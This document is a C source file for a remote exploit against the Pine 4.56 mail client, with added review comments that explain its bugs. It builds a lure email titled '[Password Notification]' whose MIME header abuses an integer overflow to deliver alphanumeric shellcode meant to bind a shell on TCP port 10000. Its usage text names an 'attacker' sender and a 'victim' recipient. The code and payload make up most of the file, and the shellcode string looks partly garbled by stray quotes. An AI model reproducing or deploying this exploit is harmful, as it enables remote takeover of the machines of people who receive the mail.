Exploit remoto para Pine v4.56 ou inferior; explora a vulnerabilidade e abre uma shell ligada à porta TCP 10000. Testado no RedHat Linux 7.0.

/* Remote Pine 4.56 Proof of Concept exploit
* for the integer overflow found by zen-parse
* advisory - http://www.packetstormsecurity.com/0309-advisories/09.10.03.txt
* By - Gyan Chawdhary ([email protected]) Pune, India
*
* greets -> zen-parse (Cool bug)
* The_Itch -> Where have u been ?
* & The Yahoo.com Pen test mailing list (great job guys)
*/
/* NOTE - This code will not work on most/all pine versions, as it was just
* coded to test the vulnerability.
*
* Tested on Redhat 7.0 with pine4.56
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* Socket connected to the mail server; opened in main(). */
int sock;
/* Mail server address; main() fills it with AF_INET, port 25 and the -i address. */
struct sockaddr_in s;
/* NOTE(review): this file-scope buffer is never used; xp_socket_read_write()
 * declares a local `buffer` of the same name that shadows it. */
char buffer[1024];
/* Output of xp_build(): the complete SMTP DATA section (headers, body, "." terminator). */
char mail[1024];
/* Converted bighawks port-binding shellcode
* to Alpha Numeric chars using asc.c from
* p57-0x0f.txt by [email protected] (port 10000)
*/
/* Author's payload string; xp_build() embeds it verbatim as the value of the
 * oversized URL parameter. The only description of what it does is the
 * author's note above (port-binding, TCP 10000); nothing further is verified here. */
char shellcode[]="LLLLZhH6pYX5H6pYHTPPPWRPPaRTSVWBRDJfhfKDTY01RUaAfhTLfXf1Doaf1"
"toajJX0Doc0toc0Tod0TokjtX0Dol0tol0TonjGX0Doo0toof1topfhvjfXf1Dou0TozGjtX0Doz0T""
ozG0tozGjDX0DozGGGG0tozGjmY0Loz0TozG0TozGG0TozGjNY0Loz0TozG0TozGG0tozGj5X0DozG""0TozGjFX0Doz0tozGGGG0tozGjrY0Loz0tozGG0tozGG0tozGj5Y0Loz0TozG0tozGjiX0Doz0tozG""0tozGjhY0Loz0tozG0tozGjtX0DozGG0tozGj7Y0Loz0TozGGfhEffYf1Lozf1TozGGGGGjYY0LozG""GGGfhAyfYf1LozGGGG0tozGjyY0Loz0tozGGG0tozGjGX0Doz0tozG0tozGjLY0LozG0TozGj7X0Do""z0Toz1pDVOfSCSCSvjK28v8RfhQzCfSvjOTPQWvsOf21OfL129PPWvlCOf2JvOvTOKI2HAXaQhnvsh""hnVbiveQSvYOG2H";
/* send/receive data */
/* Send one NUL-terminated `message` on `fd`, then block for a single reply.
 * The reply is read into a local buffer and discarded: its contents, including
 * the SMTP status code, are never examined. If send() or recv() returns <= 0
 * (error or peer closed) a bare "error" line is printed and the process exits
 * with status 0.
 * NOTE(review): memset() and strlen() are declared in <string.h>, which this
 * file does not include; the code relies on implicit declarations (removed in C99).
 * NOTE(review): one recv() may return only part of a multi-line SMTP reply, so
 * the next send() can go out before the server has finished answering. */
void xp_socket_read_write(int fd, char *message)
{
/* Shadows the unused file-scope `buffer`. */
char buffer[1024];
memset(buffer, '\0', sizeof(buffer));
/* Length comes from strlen(), so `message` must be NUL-terminated. */
if (send(fd, message, strlen(message), 0) <= 0) {
printf("error\n");
exit(0);
}
/* Wait for the server's reply; the byte count returned by recv() is dropped. */
if (recv(fd, buffer, sizeof(buffer), 0) <= 0) {
printf("error\n");
exit(0);
}

}

/* Print the usage banner for the program invoked as `s` to stdout. */
void help(char *s)
{
    printf("Remote exploit for Pine 4.56 by Gyan Chawdhary ([email protected])\n");
    printf("Usage: %s <options>\n", s);
    /* Fixed option lines carry no format arguments, so emit them in one write. */
    fputs("-h <help>\n"
          "-i <mailserver\n"
          "-f <sender>\n"
          "-t <recipient>\n", stdout);
    printf("e.g (%s -i my.mailserver -f attacker@host -t victim@host)\n", s);
}
/* Evil msg*/
/* Build the SMTP DATA section of the message into the file-scope `mail`
 * buffer and return it. The text is a MIME message whose single part is
 * declared message/external-body with a URL parameter whose continuation
 * index (presumably RFC 2231 `name*N` syntax) is 2147483723, larger than
 * INT_MAX (2147483647); the file header attributes the targeted integer
 * overflow in Pine's parameter handling to the linked advisory. The payload
 * string is placed verbatim as that parameter's value, and the finished
 * message is echoed to stdout.
 * @param from  value for the From: header
 * @param to    value for the To: header
 * @return pointer to the file-scope `mail` buffer (not a copy; reused on each call)
 * NOTE(review): sprintf() into mail[1024] is unbounded; the total length depends
 * on `from`, `to` and the payload, so long arguments overflow `mail`.
 * Detection note: a parameter continuation index of this size in a
 * message/external-body header is abnormal and is something mail filters
 * can flag directly. */
char *xp_build(char *from, char *to)
{
sprintf(mail, "DATA\r\n"
"From: <%s>\r\n"
"To: <%s>\r\n"
"cc:\r\n"
"Subject: [Password Notification]\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: message/external-body; access-type=\"URL\";\r\n"
" URL*2147483723=\"%s\";\r\n"
"Content-Transfer-Encoding: 8bit\r\n"
"Content-Description: Check this pic out\r\n.\r\n",
from, to, shellcode);
/* Echo the assembled message for the operator to see. */
printf("%s\n", mail);
return mail;
}
/* Entry point. Parses -i/-f/-t (and -h), opens a TCP connection to port 25 on
 * the -i address, runs a minimal SMTP dialogue (HELO, MAIL FROM, RCPT TO, then
 * the DATA section from xp_build()) through xp_socket_read_write(), and prints
 * "Done ...". Implicit `int` return type and no return statement (pre-C99 style).
 * NOTE(review): `ip`, `buf1` and `buf2` are never initialised, so a missing
 * -i/-f/-t option passes an indeterminate string on; strncpy() with
 * sizeof(dest) also leaves no NUL terminator when optarg fills the buffer.
 * NOTE(review): inet_addr() is declared in <arpa/inet.h>, which is not included.
 * NOTE(review): a failed connect() only prints "Error"; the dialogue then
 * continues on the unconnected socket until send() fails inside
 * xp_socket_read_write(), which exits. */
main(int argc, char **argv)
{
char ip[16], buf1[512], buf2[512], tmp[1024];
int c;

if (argc < 2) {
help(argv[0]);
exit(0);
}

/* "h::" gives -h an optional argument (GNU getopt extension); it is ignored. */
while ((c = getopt(argc, argv, "h::t:f:i:")) != -1) {

switch(c) {

case 'h':
help(argv[0]);
exit(0);
case 'i':
strncpy(ip, optarg, sizeof(ip));
break;
case 'f':
strncpy(buf1, optarg, sizeof(buf1));
break;
case 't':
strncpy(buf2, optarg, sizeof(buf2));
break;
/* No default: unknown options (returned as '?') fall through the switch. */

}
}

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("Error\n");
exit(0);
}
/* Server address: dotted-quad text from -i, SMTP port 25. */
s.sin_family = AF_INET;
s.sin_port = htons(25);
s.sin_addr.s_addr = inet_addr(ip);
memset(&(s.sin_zero), '\0', 8);
if (connect(sock, (struct sockaddr *)&s, sizeof(struct sockaddr)) < 0) { printf("Error\n");
}

/* Each step sends one command and waits for one reply; the SMTP status
 * code of the reply is never checked. */
memset(tmp, '\0', sizeof(tmp));
sprintf(tmp, "HELO %s\r\n", ip);
xp_socket_read_write(sock, tmp);
memset(tmp, '\0', sizeof(tmp));
sprintf(tmp, "MAIL FROM: <%s>\r\n", buf1);
xp_socket_read_write(sock, tmp);
memset(tmp, '\0', sizeof(tmp));
sprintf(tmp, "RCPT TO: <%s>\r\n", buf2);
xp_socket_read_write(sock, tmp);
memset(tmp, '\0', sizeof(tmp));
/* xp_build() returns the file-scope `mail` buffer with the DATA section. */
xp_socket_read_write(sock, xp_build(buf1, buf2));
printf("Done ...\n");


}
